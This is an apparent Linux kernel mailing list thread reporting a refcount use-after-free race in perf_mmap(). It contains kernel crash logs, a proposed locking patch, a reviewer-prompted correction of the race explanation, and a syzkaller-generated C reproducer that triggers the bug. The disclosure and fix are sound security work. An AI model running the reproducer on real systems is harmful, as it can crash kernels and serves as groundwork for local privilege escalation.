NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
Hi Peter,
Thanks for the review. You are right, my previous explanation was
inaccurate. The actual race condition occurs between a failing
mmap() on one event and a concurrent mmap() on a second event
that shares the ring buffer (e.g., via output redirection).
A detailed example scenario follows:
1. Thread A calls mmap(event_A). It allocates the ring buffer, sets
event_A->rb, and initializes refcount to 1. It then drops mmap_mutex.
2. Thread A calls map_range(). Suppose this fails. Thread A then
proceeds to the error path and calls perf_mmap_close().
3. Thread B concurrently calls mmap(event_B), where event_B is
configured to share event_A's buffer. Thread B acquires
event_A->mmap_mutex and sees the valid event_A->rb pointer.
4. The race triggers here: if Thread A's perf_mmap_close() logic
drops the ring buffer's refcount to 0 (releasing it) while the pointer
event_A->rb is still visible to Thread B (or was read by Thread B before
it was cleared), Thread B triggers the "refcount_t: addition on 0" warning
when it attempts to increment the refcount in perf_mmap_rb().
The fix extends the scope of mmap_mutex to cover map_range() and its
error-handling path. This ensures that event->rb is exposed to other
threads only after it has been fully mapped, or is cleaned up atomically
under the lock if mapping fails.
I have updated the commit message accordingly.
Thanks,
Haocheng
|
{
"author": "=?UTF-8?B?5L2Z5piK6ZOW?= <yuhaocheng035@gmail.com>",
"date": "Mon, 2 Feb 2026 23:51:28 +0800",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range()) on event->rb outside the locked scope. If the event is closed or the buffer is detached concurrently, the ring_buffer's reference count can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel later attempts to access or increment it.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning, followed by a memory leak warning.
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible with the attached C reproducer, which triggers the vulnerability by creating a high-frequency race between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires mmap_mutex to set up the buffer but then drops it. Meanwhile, thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a use-after-free (UAF) condition. The immediate symptom is typically a kernel warning or a denial of service through a system hang or panic, especially in environments with panic_on_warn enabled, but the underlying memory corruption is a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage the UAF state for heap grooming. If the freed memory is reallocated with a controlled structure, this could potentially be exploited for local privilege escalation, making it a critical issue on multi-user systems or in containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang University
Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
